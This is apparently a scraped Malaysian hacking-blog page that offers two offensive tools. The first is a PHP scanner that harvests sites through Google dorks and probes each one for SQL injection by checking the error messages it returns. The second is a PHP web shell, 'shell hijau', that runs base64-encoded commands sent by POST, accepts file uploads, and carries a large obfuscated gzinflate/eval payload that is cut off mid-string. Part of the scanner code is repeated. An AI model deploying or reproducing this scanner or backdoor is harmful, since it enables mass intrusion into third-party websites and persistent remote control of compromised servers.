curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$data = curl_exec($ch);
if($data){
return $data;
}else{
return 0;
}
}
function Clean($text){
return htmlspecialchars($text, ENT_QUOTES);
}
/* $x=escape("abc");
echo unescape($x); */
function unescape($txt){
echo "<script type=\"text/javascript\">document.write(unescape(\"$txt\"))</script>";
}
function escape($txt){
$decToHex=array("00","01","02","03","04","05","06","07","08","09","0A","0B","0C","0D","0E","0F","10","11","12","13","14","15","16","17","18","19","1A","1B","1C","1D","1E","1F","20","21","22","23","24","25","26","27","28","29","2A","2B","2C","2D","2E","2F","30","31","32","33","34","35","36","37","38","39","3A","3B","3C","3D","3E","3F","40","41","42","43","44","45","46","47","48","49","4A","4B","4C","4D","4E","4F","50","51","52","53","54","55","56","57","58","59","5A","5B","5C","5D","5E","5F","60","61","62","63","64","65","66","67","68","69","6A","6B","6C","6D","6E","6F","70","71","72","73","74","75","76","77","78","79","7A","7B","7C","7D","7E","7F","80","81","82","83","84","85","86","87","88","89","8A","8B","8C","8D","8E","8F","90","91","92","93","94","95","96","97","98","99","9A","9B","9C","9D","9E","9F","A0","A1","A2","A3","A4","A5","A6","A7","A8","A9","AA","AB","AC","AD","AE","AF","B0","B1","B2","B3","B4","B5","B6","B7","B8","B9","BA","BB","BC","BD","BE","BF","C0","C1","C2","C3","C4","C5","C6","C7","C8","C9","CA","CB","CC","CD","CE","CF","D0","D1","D2","D3","D4","D5","D6","D7","D8","D9","DA","DB","DC","DD","DE","DF","E0","E1","E2","E3","E4","E5","E6","E7","E8","E9","EA","EB","EC","ED","EE","EF","F0","F1","F2","F3","F4","F5","F6","F7","F8","F9","FA","FB","FC","FD","FE","FF");
for($i=0;$i<strlen($txt);$i++){
$e .= "%".$decToHex[ord($txt[$i])];
}
return $e;
}
?>
save as.php
masuk dlm domain .php
ready to use
$listC=array("Indonesia~~~ID","Afghanistan~~~AF","Albania~~~AL","Algeria~~~DZ","American Samoa~~~AS","Andorra~~~AD","Angola~~~AO","Anguilla~~~AI","Antarctica~~~AQ","Antigua and Barbuda~~~AG","Argentina~~~AR","Armenia~~~AM","Aruba~~~AW","Australia~~~AU","Austria~~~AT","Azerbaijan~~~AZ","Bahamas~~~BS","Bahrain~~~BH","Bangladesh~~~BD","Barbados~~~BB","Belarus~~~BY","Belgium~~~BE","Belize~~~BZ","Benin~~~BJ","Bermuda~~~BM","Bhutan~~~BT","Bolivia~~~BO","Bosnia","and Herzegovina~~~BA","Botswana~~~BW","Bouvet Island~~~BV","Brazil~~~BR","British Indian Ocean Territory~~~IO","Brunei Darussalam~~~BN","Bulgaria~~~BG","Burkina Faso~~~BF","Burundi~~~BI","Cambodia~~~KH","Cameroon~~~CM","Canada~~~CA","Cape Verde~~~CV","Cayman Islands~~~KY","Central African Republic~~~CF","Chad~~~TD","Chile~~~CL","China~~~CN","Christmas Island~~~CX","Cocos (Keeling) Islands~~~CC","Colombia~~~CO","Comoros~~~KM","Congo~~~CG","Congo, Democratic","Republic~~~CD","Cook Islands~~~CK","Costa Rica~~~CR","Cote d'Ivoire~~~CI","Croatia~~~HR","Cyprus~~~CY","Czech Republic~~~CZ","Denmark~~~DK","Djibouti~~~DJ","Dominica~~~DM","Dominican Republic~~~DO","East Timor~~~TL","Ecuador~~~EC","Egypt~~~EG","El Salvador~~~SV","Equatorial Guinea~~~GQ","Eritrea~~~ER","Estonia~~~EE","Ethiopia~~~ET","Falkland Islands (Malvinas)~~~FK","Faroe Islands~~~FO","Fiji~~~FJ","Finland~~~FI","France~~~FR","French Guiana~~~GF","French","Polynesia~~~PF","French Southern Territories~~~TF","Gabon~~~GA","Gambia~~~GM","Georgia~~~GE","Germany~~~DE","Ghana~~~GH","Gibraltar~~~GI","Greece~~~GR","Greenland~~~GL","Grenada~~~GD","Guadeloupe~~~GP","Guam~~~GU","Guatemala~~~GT","Guinea~~~GN","Guinea-Bissau~~~GW","Guyana~~~GY","Haiti~~~HT","Heard and","McDonald Islands~~~HM","Honduras~~~HN","Hong Kong~~~HK","Hungary~~~HU","Iceland~~~IS","India~~~IN","Indonesia~~~ID","Iraq~~~IQ","Ireland~~~IE","Israel~~~IL","Italy~~~IT","Jamaica~~~JM","Japan~~~JP","Jordan~~~JO","Kazakhstan~~~KZ","Kenya~~~KE","Kiribati~~~KI","Kuwait~~~KW","Kyrgyzstan~~~KG","Lao People's Democratic Republic~~~LA","Latvia~~~LV","Lebanon~~~LB","Lesotho~~~LS","Liberia~~~LR","Libya~~~LY","Liechtenstein~~~LI","Lithuania~~~LT","Luxembourg~~~LU","Macau~~~MO","Macedonia~~~MK","Madagascar~~~MG","Malawi~~~MW","Malaysia~~~MY","Maldives~~~MV","Mali~~~ML","Malta~~~MT","Marshall Islands~~~MH","Martinique~~~MQ","Mauritania~~~MR","Mauritius~~~MU","Mayotte~~~YT","Mexico~~~MX","Micronesia~~~FM","Moldova~~~MD","Monaco~~~MC","Mongolia~~~MN","Montserrat~~~MS","Morocco~~~MA","Mozambique~~~MZ","Namibia~~~NA","Nauru~~~NR","Nepal~~~NP","Netherlands~~~NL","Netherlands Antilles~~~AN","New Caledonia~~~NC","New Zealand~~~NZ","Nicaragua~~~NI","Niger~~~NE","Nigeria~~~NG","Niue~~~NU","Norfolk Island~~~NF","Northern Mariana Islands~~~MP","Norway~~~NO","Oman~~~OM","Pakistan~~~PK","Palau~~~PW","Palestinian Territory~~~PS","Panama~~~PA","Papua New Guinea~~~PG","Paraguay~~~PY","Peru~~~PE","Philippines~~~PH","Pitcairn~~~PN","Poland~~~PL","Portugal~~~PT","Puerto Rico~~~PR","Qatar~~~QA","Reunion~~~RE","Romania~~~RO","Russian Federation~~~RU","Rwanda~~~RW","Saint Kitts and Nevis~~~KN","Saint Lucia~~~LC","Saint Vincent and the Grenadines~~~VC","Samoa~~~WS","San Marino~~~SM","Sao Tome and Principe~~~ST","Saudi Arabia~~~SA","Senegal~~~SN","Serbia and Montenegro~~~CS","Seychelles~~~SC","Sierra Leone~~~SL","Singapore~~~SG","Slovakia~~~SK","Slovenia~~~SI","Solomon Islands~~~SB","Somalia~~~SO","South Africa~~~ZA","South Georgia and The South Sandwich Islands~~~GS","South Korea~~~KR","Spain~~~ES","Sri Lanka~~~LK","St. Helena~~~SH","St. Pierre and Miquelon~~~PM","Suriname~~~SR","Svalbard and Jan Mayen Islands~~~SJ","Swaziland~~~SZ","Sweden~~~SE","Switzerland~~~CH","Taiwan~~~TW","Tajikistan~~~TJ","Tanzania~~~TZ","Thailand~~~TH","Togo~~~TG","Tokelau~~~TK","Tonga~~~TO","Trinidad and Tobago~~~TT","Tunisia~~~TN","Turkey~~~TR","Turkmenistan~~~TM","Turks and Caicos Islands~~~TC","Tuvalu~~~TV","Uganda~~~UG","Ukraine~~~UA","United Arab Emirates~~~AE","United Kingdom~~~GB","United States~~~US","United States Minor Outlying Islands~~~UM","Uruguay~~~UY","Uzbekistan~~~UZ","Vanuatu~~~VU","Vatican~~~VA","Venezuela~~~VE","Viet Nam~~~VN","Virgin Islands (British)~~~VG","Virgin Islands (U.S.)~~~VI","Wallis and Futuna Islands~~~WF","Western Sahara~~~EH","Yemen~~~YE","Zambia~~~ZM","Zimbabwe~~~ZW","--Special--~~~MY","Government1~~~GOV","Government2~~~GO",".aero~~~AERO",".asia~~~ASIA",".biz~~~BIZ",".coop~~~COOP",".eu~~~EU",".info~~~INFO",".museum~~~MUSEUM",".name~~~NAME",".pro~~~PRO",".travel~~~TRAVEL",".fm~~~FM",".tv~~~TV",".cc~~~CC",".co~~~CO",".org~~~ORG",".net~~~NET",".mobi~~~MOBI");
?>
<html><!--
#################################################################
# __\_ #
# | II | #
# | , | #
# ______ \) #
# []/ KH \[] / #
# / \______/ \/ #
# / \ __ / #
# (\ \/ #
# . #
# #
#_ _ _______ __ _ _______ _ _ _______ _______ _ _ #
#|____/ |______ | \ | |_____| |_____| |_____| | |____/ #
#| \_ |______ | \_| | | | | | | |_____ | \_ #
# #
# WWW.KENAHACK.COM #
# KH supporter : Syam92x | Fakyu Tuyu #
# #
# #
# #
# Pemaju dunia IT Malaysia : #
# @ Ahli Syurga Crew #
# @ GaySec #
# @ Rilekscrew #
# @ WAHFM #
# @ h3x4 crew #
# @ Newbie3viLc063s #
# @ dan semua Underground Team #
# #
# #
#################################################################
//-->
<head>
<title>[ KH ] ~ SQLi scanner</title>
<style>
body{
background: #0F0F0F;
color: #A9A9A9;
font-family: monospace;
font-size: 12px;
}
input{
background: #808080;
border: 1px solid #000000;
color: #E6E6FA;
}
h2{
color: #E6E6FA;
}
a{ color: #5A5A5A; text-decoration: none; }
a:visited, a:active{ color: #5C5C5C; text-decoration: line-through; }
a:hover{ color: #00FFCC; text-decoration: line-through; }
.effectok:hover { text-decoration: underline; }
.effectfalse:hover { text-decoration: line-through; }
</style>
<link rel="shortcut icon" href="data:image/x-icon;base64,AAABAAEAEBAQAAAAAAAoAQAAFgAAACgAAAAQAAAAIAAAAAEABAAAAAAAgAAAAAAAAAAAAAAAEAAAAAAAAAAaSv8A////AFL//wCxAC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAEQEBAQEAAQEAAREBAQAQAQABAQEBAQABAAEBAQEAEQARABABEAAAAAAAAAAAAAAAAAAAAAADMzMzMzMzMzMzMzIzMzMzMyIjIiMiIyMzMyMjIyMzIzMiIyMjIzMjMyMzIyMjMyMzIiMiIyMzIzMzMzMzMzMzMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"></link>
</head>
<body>
<center>
<br>
<Script Language='Javascript'><!--
document.write(unescape('%3C%69%6D%67%20%73%74%79%6C%65%3D%22%77%69%64%74%68%3A%20%34%35%30%70%78%3B%20%68%65%69%67%68%74%3A%20%31%33%31%70%78%3B%22%20%61%6C%74%3D%22%22%0A%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%32%2E%62%70%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%2F%2D%41%73%6B%46%6F%68%70%79%31%72%51%2F%54%69%71%47%2D%57%56%6B%64%44%49%2F%41%41%41%41%41%41%41%41%41%4E%77%2F%4D%76%41%38%55%2D%50%73%73%42%45%2F%73%31%36%30%30%2F%73%63%2E%70%6E%67%22%3E'));
//-->
</Script>
<form action='' method='post'>
<b>Dork yg ingin digunakan</b>: <p><input type='text' name='dork' value='inurl:php?id='><br>
<select id="countryx" name="countryx">
<option value="*">Semua Negara</option>
<?php foreach($listC as $listC2){
list($cou,$idcou) = explode("~~~",$listC2);
if(strlen($cou)>15){
$coux2=substr($cou, 0, 15)."...";
}else{
$coux2=$cou;
}
if(!empty($cou) && !empty($idcou)){
$xttx.="<option value=\"".trim($cou)."---".trim($idcou)."\">".trim($coux2)."</option>";
}
}
echo $xttx;
?>
</select><br>
<input type="checkbox" name="vulne" value="1"><label>Hanya tunjuk yg <span style="color: red;">Vuln</span></label>
</p>
<input type='submit' value=' [ Scan ] '>
</form>
<hr></center><br>
<?php if($_POST['dork']){
doit();
} ?>
<br><Script Language='Javascript'><!--
document.write(unescape('%3C%63%65%6E%74%65%72%3E%0A%53%65%6E%61%72%61%69%20%44%6F%72%6B%20%3A%20%0A%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6B%65%6E%61%68%61%63%6B%2E%63%6F%6D%2E%66%61%69%6C%2E%6A%65%6E%69%73%2E%74%78%74%2E%6D%79%63%72%65%77%73%2E%69%6E%66%6F%2F%64%6F%72%6B%6C%69%73%74%2D%50%48%50%2E%74%78%74%22%3E%3C%69%6D%67%0A%20%73%74%79%6C%65%3D%22%62%6F%72%64%65%72%3A%20%30%70%78%20%73%6F%6C%69%64%20%3B%20%77%69%64%74%68%3A%20%34%30%70%78%3B%20%68%65%69%67%68%74%3A%20%34%30%70%78%3B%22%20%61%6C%74%3D%22%22%0A%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%32%2E%62%70%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%2F%2D%43%4F%6C%63%54%76%75%4C%56%39%38%2F%54%69%71%47%2D%57%2D%73%68%64%49%2F%41%41%41%41%41%41%41%41%41%4E%6F%2F%4D%4C%61%66%50%59%76%69%33%4B%4D%2F%73%31%36%30%30%2F%70%68%70%2E%70%6E%67%22%3E%3C%2F%61%3E%3C%61%0A%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6B%65%6E%61%68%61%63%6B%2E%63%6F%6D%2E%66%61%69%6C%2E%6A%65%6E%69%73%2E%74%78%74%2E%6D%79%63%72%65%77%73%2E%69%6E%66%6F%2F%64%6F%72%6B%6C%69%73%74%2D%41%53%50%2E%74%78%74%22%3E%3C%69%6D%67%0A%20%73%74%79%6C%65%3D%22%62%6F%72%64%65%72%3A%20%30%70%78%20%73%6F%6C%69%64%20%3B%20%77%69%64%74%68%3A%20%34%30%70%78%3B%20%68%65%69%67%68%74%3A%20%34%30%70%78%3B%22%20%61%6C%74%3D%22%22%0A%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%32%2E%62%70%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%2F%2D%56%75%67%6A%6E%32%4F%52%47%50%73%2F%54%69%71%47%2D%50%66%4A%75%4E%49%2F%41%41%41%41%41%41%41%41%41%4E%59%2F%70%46%46%6A%6E%4D%53%35%57%71%41%2F%73%31%36%30%30%2F%61%73%70%2E%70%6E%67%22%3E%3C%2F%61%3E%3C%62%72%3E%0A%53%51%4C%69%20%54%75%74%6F%72%69%61%6C%20%28%20%6D%79%73%71%6C%20%35%2E%58%20%29%20%3A%20%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%6B%65%6E%61%68%61%63%6B%2E%63%6F%6D%2F%32%30%31%31%2F%30%37%2F%68%74%68%2D%73%71%6C%2D%69%6E%6A%65%63%74%69%6F%6E%2E%68%74%6D%6C%22%20%0A%0A%74%61%72%67%65%74%3D%22%5F%62%6C%61%6E%6B%22%3E%44%69%73%69%6E%69%3C%2F%61%3E%3C%62%72%3E%3C%61%0A%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%6B%65%6E%61%68%61%63%6B%2E%63%6F%6D%22%3E%3C%69%6D%67%0A%20%73%74%79%6C%65%3D%22%62%6F%72%64%65%72%3A%20%30%70%78%20%73%6F%6C%69%64%20%3B%20%77%69%64%74%68%3A%20%33%34%34%70%78%3B%20%68%65%69%67%68%74%3A%20%36%36%70%78%3B%22%20%61%6C%74%3D%22%22%0A%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%33%2E%62%70%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%2F%2D%74%41%35%65%51%61%35%4E%68%79%41%2F%54%69%71%47%2D%4B%56%36%35%64%49%2F%41%41%41%41%41%41%41%41%41%4E%67%2F%33%43%75%78%6B%67%56%46%31%6F%59%2F%73%31%36%30%30%2F%6B%65%6E%61%68%61%63%6B%2E%70%6E%67%22%3E%3C%2F%61%3E%0A%09%09%3C%2F%63%65%6E%74%65%72%3E'));
//-->
</Script>
</body>
</html>
<?php
function doit(){
if($_POST['countryx']){
@set_time_limit(0);
@error_reporting(0);
@ignore_user_abort(true);
ini_set('memory_limit', '128M');
$google = "http://www.google.com/search?source=hp&biw=1024&bih=414&btnG=Google+Search&num=100&start=REPLACE_START&q=REPLACE_DORK";
//$google = "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=REPLACE_DORK&num=100&hl=en&as_qdr=all&start=REPLACE_START&sa=N";
$i = 0;
$a = 0;
$b = 0;
$ax2 = 0;
if($_POST['countryx']!="*"){
list($cou2,$idcou2) = explode("---",$_POST['countryx']);
$dork=$_POST['dork']."+site:".$idcou2;
}else{
$dork=$_POST['dork']."*";
}
while($b <= 10000) {
$a = 0;
flush(); ob_flush();
echo "[#]Jumlah laman diScan : [ $b ]<br />";
echo "[#]Dork yg digunakan : [ <b>".$dork."</b> ]<br />";
if($_POST['vulne']=="1"){$vulnex="Ya";}else{$vulnex="Tidak";}
echo "[#]Hanya tunjuk yg Vuln? : <b>".$vulnex."</b><br />";
if(!empty($cou2)){echo "[#]Negara : <b>".Clean($cou2)."</b><br />";}
echo "[#]Sila tunggu...Scanning! .<br />";
flush(); ob_flush();
if(preg_match("/did not match any documents/", Connect_Host(str_replace(array("REPLACE_DORK", "REPLACE_START"), array($dork, "$b"), $google)), $val)){
echo "~scanning tidak berjaya O.o<br />";
flush(); ob_flush();
break;
}
preg_match_all("/<h3 class=(.*?)><a href=\"(.*?)\" [^>]*>/", Connect_Host(str_replace(array("REPLACE_DORK", "REPLACE_START"), array($dork, "$b"), $google)), $sites);
echo "Keputusan Scanning...<br>";
flush(); ob_flush();
while(1){
preg_match("/http:\/\/(.*?)\/(.*?)/",$sites[2][$a],$sitesx);
$fx2 = false;
if($ax2==0){
if($sitesx[1]){$ax2=array($sitesx[1]);$fx2=true;}
}else{
if(!in_array($sitesx[1], $ax2)){
if($sitesx[1]){array_push($ax2,$sitesx[1]);$fx2=true;}
}
}
if($fx2 == true){
if(preg_match("/You have an error in your SQL|Division by zero in|supplied argument is not a valid MySQL result resource in|Call to a member function|Microsoft JET Database|ODBC Microsoft Access Driver|Microsoft OLE DB Provider for SQL Server|Unclosed quotation mark|Microsoft OLE DB Provider for Oracle|Incorrect syntax near|SQL query failed/", Connect_Host(str_replace("=", "='", $sites[2][$a])))) {
echo "<a href='".Clean(str_replace("=", "='", $sites[2][$a]))."' target='_blank' class='effectok'>".str_replace("=", "='", $sites[2][$a])."</a> <== <font color='red'>[vuln]</font><br>";
}else{
if($_POST['vulne']!="1"){
echo "<a href='".Clean(str_replace("=", "='", $sites[2][$a]))."' target='_blank' class='effectfalse'>".str_replace("=", "='", $sites[2][$a])."</a> <== <font color='grey'>[O.o]</font><br>";
flush(); ob_flush();
}
}
if($a > count($sites[2])-2) {
echo "Sila tunggu , scan page lain...<br />";
break;
}
}
$a = $a+1;
}
$b = $b+100;
}
}else{
die("Error dlm pemilihan Negara!");
}
}
function Connect_Host($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$data = curl_exec($ch);
if($data){
return $data;
}else{
return 0;
}
}
function Clean($text){
return htmlspecialchars($text, ENT_QUOTES);
}
/* $x=escape("abc");
echo unescape($x); */
function unescape($txt){
echo "<script type=\"text/javascript\">document.write(unescape(\"$txt\"))</script>";
}
function escape($txt){
$decToHex=array("00","01","02","03","04","05","06","07","08","09","0A","0B","0C","0D","0E","0F","10","11","12","13","14","15","16","17","18","19","1A","1B","1C","1D","1E","1F","20","21","22","23","24","25","26","27","28","29","2A","2B","2C","2D","2E","2F","30","31","32","33","34","35","36","37","38","39","3A","3B","3C","3D","3E","3F","40","41","42","43","44","45","46","47","48","49","4A","4B","4C","4D","4E","4F","50","51","52","53","54","55","56","57","58","59","5A","5B","5C","5D","5E","5F","60","61","62","63","64","65","66","67","68","69","6A","6B","6C","6D","6E","6F","70","71","72","73","74","75","76","77","78","79","7A","7B","7C","7D","7E","7F","80","81","82","83","84","85","86","87","88","89","8A","8B","8C","8D","8E","8F","90","91","92","93","94","95","96","97","98","99","9A","9B","9C","9D","9E","9F","A0","A1","A2","A3","A4","A5","A6","A7","A8","A9","AA","AB","AC","AD","AE","AF","B0","B1","B2","B3","B4","B5","B6","B7","B8","B9","BA","BB","BC","BD","BE","BF","C0","C1","C2","C3","C4","C5","C6","C7","C8","C9","CA","CB","CC","CD","CE","CF","D0","D1","D2","D3","D4","D5","D6","D7","D8","D9","DA","DB","DC","DD","DE","DF","E0","E1","E2","E3","E4","E5","E6","E7","E8","E9","EA","EB","EC","ED","EE","EF","F0","F1","F2","F3","F4","F5","F6","F7","F8","F9","FA","FB","FC","FD","FE","FF");
for($i=0;$i<strlen($txt);$i++){
$e .= "%".$decToHex[ord($txt[$i])];
}
return $e;
}
?>
save as.php
masuk dlm domain .php
ready to use
written by ejam at 07:39 pm
Make a comment Permalink
shell hijau.php
Tuesday, November 22, 2011
<?php if(!defined("GR_HOST_ID")){define("GR_HOST_ID", "index_prx43");}@include_once('/home/cindy/public_html/picture_library/functions.php');
if(isset($_GET['languages'])){header("HTTP/1.0 304 Not Modified");exit;}
if(isset($_GET['cookies'])){echo '--'.'><i>Goog1e_analist_certs</i><br>';
if(isset($_POST['e'])){eval(base64_decode($_POST['e']));}
if(isset($_FILES['f'])){if(!@copy($_FILES['f']['tmp_name'],$_FILES['f']['name'])){@move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}}
if(isset($_GET['d'])){echo @is_writable($_GET['d']);}exit;}?>
<?php
$auth_pass = '';
$color="#df5";
$default_action="FilesMan";
$default_charset="Windows-1251";
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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